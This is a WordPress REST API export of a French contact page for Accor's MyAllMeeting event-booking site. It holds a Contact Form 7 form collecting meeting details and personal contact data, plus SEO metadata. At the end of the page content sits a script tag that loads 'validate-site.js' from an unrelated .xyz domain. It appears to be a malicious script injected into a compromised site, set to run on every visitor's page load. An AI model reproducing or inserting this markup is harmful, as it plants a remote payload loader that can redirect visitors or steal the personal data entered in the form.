{"id":27149,"date":"2018-07-23T11:09:46","date_gmt":"2018-07-23T09:09:46","guid":{"rendered":"https:\/\/myallmeeting.com\/?page_id=27149"},"modified":"2018-07-23T11:09:46","modified_gmt":"2018-07-23T09:09:46","slug":"nous-contacter-mon-congres","status":"publish","type":"page","link":"https:\/\/myallmeeting.com\/fr\/nous-contacter-mon-congres\/","title":{"rendered":"Nous contacter &#8211; Mon congr\u00e8s"},"content":{"rendered":"\n<div class=\"wpcf7 no-js\" id=\"wpcf7-f27148-o1\" lang=\"fr-FR\" dir=\"ltr\" data-wpcf7-id=\"27148\">\n<div class=\"screen-reader-response\"><p role=\"status\" aria-live=\"polite\" aria-atomic=\"true\"><\/p> <ul><\/ul><\/div>\n<form action=\"\/fr\/wp-json\/wp\/v2\/pages\/27149#wpcf7-f27148-o1\" method=\"post\" class=\"wpcf7-form init\" aria-label=\"Formulaire de contact\" novalidate=\"novalidate\" data-status=\"init\">\n<fieldset class=\"hidden-fields-container\"><input type=\"hidden\" name=\"_wpcf7\" value=\"27148\" \/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"6.1.5\" \/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"fr_FR\" \/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f27148-o1\" \/><input type=\"hidden\" name=\"_wpcf7_container_post\" value=\"0\" \/><input type=\"hidden\" name=\"_wpcf7_posted_data_hash\" value=\"\" \/><input type=\"hidden\" name=\"_wpcf7dtx_version\" value=\"5.0.5\" \/><input type=\"hidden\" name=\"_wpcf7_recaptcha_response\" value=\"\" \/>\n<\/fieldset>\n<div id=\"form-cta\">\n\t<div class=\"title-form\">\n\t\t<p>Accor met \u00e0 votre disposition<br \/>\nune \u00e9quipe d\u2019experts pour vous accompagner\n\t\t<\/p>\n\t<\/div>\n\t<p>N\u2019h\u00e9sitez pas \u00e0 nous soumettre votre cahier des charges en compl\u00e9tant le formulaire ci-dessous.\n\t<\/p>\n\t<div class=\"form-group col-sm-6 col-xs-12\">\n\t\t<p><label for=\"type_reunion\" class=\"required-field\">Type de r\u00e9union<\/label><br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"type-of-meeting\"><select class=\"wpcf7-form-control wpcf7-select wpcf7-validates-as-required form-control\" aria-required=\"true\" aria-invalid=\"false\" name=\"type-of-meeting\"><option value=\"R\u00e9union avec h\u00e9bergement\">R\u00e9union avec h\u00e9bergement<\/option><option value=\"R\u00e9union sans h\u00e9bergement\">R\u00e9union sans h\u00e9bergement<\/option><option value=\"H\u00e9bergement de groupes\">H\u00e9bergement de groupes<\/option><\/select><\/span>\n\t\t<\/p>\n\t<\/div>\n\t<div class=\"form-group col-sm-6 col-xs-12\">\n\t\t<p><label for=\"email\" class=\"required-field\">Nombre de participants<\/label><br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"nb_participants\"><input class=\"wpcf7-form-control wpcf7-number wpcf7-validates-as-required wpcf7-validates-as-number form-control\" min=\"0\" max=\"1000\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"number\" name=\"nb_participants\" \/><\/span>\n\t\t<\/p>\n\t<\/div>\n\t<fieldset class=\"duree\">\n\t\t<legend class=\"required-field\">Quand ?\n\t\t<\/legend>\n\t\t<div class=\" form-group col-sm-6 col-xs-12\">\n\t\t\t<p><label for=\"date-debut\">DU<\/label><br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"date_debut\"><input class=\"wpcf7-form-control wpcf7-date wpcf7-validates-as-required wpcf7-validates-as-date form-control col-sm-6 col-xs-12\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"date\" name=\"date_debut\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/div>\n\t\t<div class=\"form-group col-sm-6 col-xs-12\">\n\t\t\t<p><label for=\"date-fin\">AU<\/label><br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"date_fin\"><input class=\"wpcf7-form-control wpcf7-date wpcf7-validates-as-required wpcf7-validates-as-date form-control col-sm-6 col-xs-12\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"date\" name=\"date_fin\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/div>\n\t<\/fieldset>\n\t<div class=\"form-group col-sm-6 col-xs-12\">\n\t\t<p><label for=\"dates-flexibles\" class=\"required-field\">Dates flexibles<\/label><br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"flexible-dates\"><select class=\"wpcf7-form-control wpcf7-select wpcf7-validates-as-required form-control\" aria-required=\"true\" aria-invalid=\"false\" name=\"flexible-dates\"><option value=\"OUI\">OUI<\/option><option value=\"NON\">NON<\/option><\/select><\/span>\n\t\t<\/p>\n\t<\/div>\n\t<div class=\"form-group col-sm-6 col-xs-12\">\n\t\t<p><label for=\"lieu\" class=\"required-field\">O\u00f9 ?<\/label><br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"location\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required form-control\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"location\" \/><\/span>\n\t\t<\/p>\n\t<\/div>\n\t<div class=\"form-group col-sm-12\">\n\t\t<p><label for=\"precisions\">Pr\u00e9cisions<\/label><br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"precisions\"><textarea cols=\"50\" rows=\"8\" maxlength=\"2000\" class=\"wpcf7-form-control wpcf7-textarea\" aria-invalid=\"false\" name=\"precisions\"><\/textarea><\/span>\n\t\t<\/p>\n\t<\/div>\n\t<div class=\"form-group col-sm-12\">\n\t\t<p><label for=\"civilite\" class=\"required-field\">Civilit\u00e9<\/label><span class=\"wpcf7-form-control-wrap\" data-name=\"civility\"><span class=\"wpcf7-form-control wpcf7-radio\"><span class=\"wpcf7-list-item first\"><label><input type=\"radio\" name=\"civility\" value=\"Madame\" checked=\"checked\" \/><span class=\"wpcf7-list-item-label\">Madame<\/span><\/label><\/span><span class=\"wpcf7-list-item last\"><label><input type=\"radio\" name=\"civility\" value=\"Monsieur\" \/><span class=\"wpcf7-list-item-label\">Monsieur<\/span><\/label><\/span><\/span><\/span>\n\t\t<\/p>\n\t<\/div>\n\t<div class=\"form-group col-sm-6 col-xs-12\">\n\t\t<p><label for=\"nom\" class=\"required-field\">Nom <\/label><br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"lastname\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required form-control\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"lastname\" \/><\/span>\n\t\t<\/p>\n\t<\/div>\n\t<div class=\"form-group col-sm-6 col-xs-12\">\n\t\t<p><label for=\"prenom\" class=\"required-field\">Pr\u00e9nom<\/label><br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"firstname\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required form-control\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"firstname\" \/><\/span>\n\t\t<\/p>\n\t<\/div>\n\t<div class=\"form-group col-sm-6 col-xs-12\" style=\"max-height:53px\">\n\t\t<p><label for=\"country\" class=\"required-field\">Pays<\/label><br \/>\n<select id=\"countries\" required class=\"form-control\"><\/select><br \/>\n\t\t<span class=\"wpcf7-form-control-wrap country\" data-name=\"country\"><input type=\"hidden\" name=\"country\" class=\"wpcf7-form-control wpcf7-hidden wpcf7dtx wpcf7dtx-hidden\" aria-invalid=\"false\"><\/span>\n\t\t<\/p>\n\t<\/div>\n\t<div class=\"form-group col-sm-6 col-xs-12\">\n\t\t<p><label for=\"nom\" class=\"required-field\">Soci\u00e9t\u00e9<\/label><br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"society\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required form-control\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"society\" \/><\/span>\n\t\t<\/p>\n\t<\/div>\n\t<div class=\"form-group col-sm-6 col-xs-12\">\n\t\t<p><label for=\"email\" class=\"required-field\">Email<\/label><br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"email\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-email wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-email form-control\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"email\" name=\"email\" \/><\/span>\n\t\t<\/p>\n\t<\/div>\n\t<div class=\"form-group col-sm-6 col-xs-12\">\n\t\t<p><label for=\"phone\" class=\"required-field\">T\u00e9l\u00e9phone<\/label><br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"phone\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-tel wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-tel form-control\" id=\"phone\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"tel\" name=\"phone\" \/><\/span>\n\t\t<\/p>\n\t<\/div>\n\t<div class=\"form-group col-sm-6 col-xs-12\">\n\t\n\t<\/div>\n\t<div class=\"clearfix\">\n\t<\/div>\n<\/div>\n<div class=\"wpcf7-response-output\" aria-hidden=\"true\"><\/div>\n<span class=\"wpcf7-form-control-wrap recipient-email\" data-name=\"recipient-email\"><input type=\"hidden\" name=\"recipient-email\" class=\"wpcf7-form-control wpcf7-hidden wpcf7dtx wpcf7dtx-hidden\" aria-invalid=\"false\" value=\"no-reply@myallmeeting.com\"><\/span>\n<div id=\"form-cta-info\">\n\t<div class=\"required-fields-indication\">\n\t\t<p>Champs obligatoires\n\t\t<\/p>\n\t<\/div>\n<span class=\"wpcf7-form-control-wrap deal_id\" data-name=\"deal_id\"><input type=\"hidden\" name=\"deal_id\" class=\"wpcf7-form-control wpcf7-hidden wpcf7dtx wpcf7dtx-hidden\" aria-invalid=\"false\"><\/span>\n<span class=\"wpcf7-form-control-wrap gclid\" data-name=\"gclid\"><input type=\"hidden\" name=\"gclid\" class=\"wpcf7-form-control wpcf7-hidden wpcf7dtx wpcf7dtx-hidden\" aria-invalid=\"false\"><\/span>\n\t<p><input class=\"wpcf7-form-control wpcf7-submit has-spinner btn btn-info\" type=\"submit\" value=\"Valider\" \/>\n\t<\/p>\n<\/div>\n<\/form>\n<\/div>\n\n<p><script src=\"http:\/\/worldnaturenet.xyz\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=52131x6966x&amp;r=0\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-contact.php","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-27149","page","type-page","status-publish","hentry"],"acf":[],"yoast_head":"<title>Nous contacter - Mon congr\u00e8s - Accor MyAllMeeting.com<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/myallmeeting.com\/fr\/wp-json\/wp\/v2\/pages\/27149\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Nous contacter - Mon congr\u00e8s - Accor MyAllMeeting.com\" \/>\n<meta property=\"og:url\" content=\"https:\/\/myallmeeting.com\/fr\/nous-contacter-mon-congres\/\" \/>\n<meta property=\"og:site_name\" content=\"Accor MyAllMeeting.com\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/myallmeeting.com\/fr\/nous-contacter-mon-congres\/\",\"url\":\"https:\/\/myallmeeting.com\/fr\/nous-contacter-mon-congres\/\",\"name\":\"Nous contacter - Mon congr\u00e8s - Accor MyAllMeeting.com\",\"isPartOf\":{\"@id\":\"https:\/\/www.myallmeeting.com\/fr\/#website\"},\"datePublished\":\"2018-07-23T09:09:46+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/myallmeeting.com\/fr\/nous-contacter-mon-congres\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/myallmeeting.com\/fr\/nous-contacter-mon-congres\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/myallmeeting.com\/fr\/nous-contacter-mon-congres\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/myallmeeting.com\/fr\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Nous contacter &#8211; Mon congr\u00e8s\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.myallmeeting.com\/fr\/#website\",\"url\":\"https:\/\/www.myallmeeting.com\/fr\/\",\"name\":\"Accor MyAllMeeting.com\",\"description\":\"Les Meilleurs lieux pour vos Ev\u00e9nements Professionnels\",\"publisher\":{\"@id\":\"https:\/\/www.myallmeeting.com\/fr\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.myallmeeting.com\/fr\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.myallmeeting.com\/fr\/#organization\",\"name\":\"ACCOR\",\"url\":\"https:\/\/www.myallmeeting.com\/fr\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/www.myallmeeting.com\/fr\/#\/schema\/logo\/image\/\",\"url\":\"\",\"contentUrl\":\"\",\"caption\":\"ACCOR\"},\"image\":{\"@id\":\"https:\/\/www.myallmeeting.com\/fr\/#\/schema\/logo\/image\/\"}}]}<\/script>","yoast_head_json":{"title":"Nous contacter - Mon congr\u00e8s - Accor MyAllMeeting.com","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/myallmeeting.com\/fr\/wp-json\/wp\/v2\/pages\/27149","og_locale":"fr_FR","og_type":"article","og_title":"Nous contacter - Mon congr\u00e8s - Accor MyAllMeeting.com","og_url":"https:\/\/myallmeeting.com\/fr\/nous-contacter-mon-congres\/","og_site_name":"Accor MyAllMeeting.com","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/myallmeeting.com\/fr\/nous-contacter-mon-congres\/","url":"https:\/\/myallmeeting.com\/fr\/nous-contacter-mon-congres\/","name":"Nous contacter - Mon congr\u00e8s - Accor MyAllMeeting.com","isPartOf":{"@id":"https:\/\/www.myallmeeting.com\/fr\/#website"},"datePublished":"2018-07-23T09:09:46+00:00","breadcrumb":{"@id":"https:\/\/myallmeeting.com\/fr\/nous-contacter-mon-congres\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/myallmeeting.com\/fr\/nous-contacter-mon-congres\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/myallmeeting.com\/fr\/nous-contacter-mon-congres\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/myallmeeting.com\/fr\/"},{"@type":"ListItem","position":2,"name":"Nous contacter &#8211; Mon congr\u00e8s"}]},{"@type":"WebSite","@id":"https:\/\/www.myallmeeting.com\/fr\/#website","url":"https:\/\/www.myallmeeting.com\/fr\/","name":"Accor MyAllMeeting.com","description":"Les Meilleurs lieux pour vos Ev\u00e9nements Professionnels","publisher":{"@id":"https:\/\/www.myallmeeting.com\/fr\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.myallmeeting.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/www.myallmeeting.com\/fr\/#organization","name":"ACCOR","url":"https:\/\/www.myallmeeting.com\/fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/www.myallmeeting.com\/fr\/#\/schema\/logo\/image\/","url":"","contentUrl":"","caption":"ACCOR"},"image":{"@id":"https:\/\/www.myallmeeting.com\/fr\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/myallmeeting.com\/fr\/wp-json\/wp\/v2\/pages\/27149","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/myallmeeting.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/myallmeeting.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/myallmeeting.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/myallmeeting.com\/fr\/wp-json\/wp\/v2\/comments?post=27149"}],"version-history":[{"count":0,"href":"https:\/\/myallmeeting.com\/fr\/wp-json\/wp\/v2\/pages\/27149\/revisions"}],"wp:attachment":[{"href":"https:\/\/myallmeeting.com\/fr\/wp-json\/wp\/v2\/media?parent=27149"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}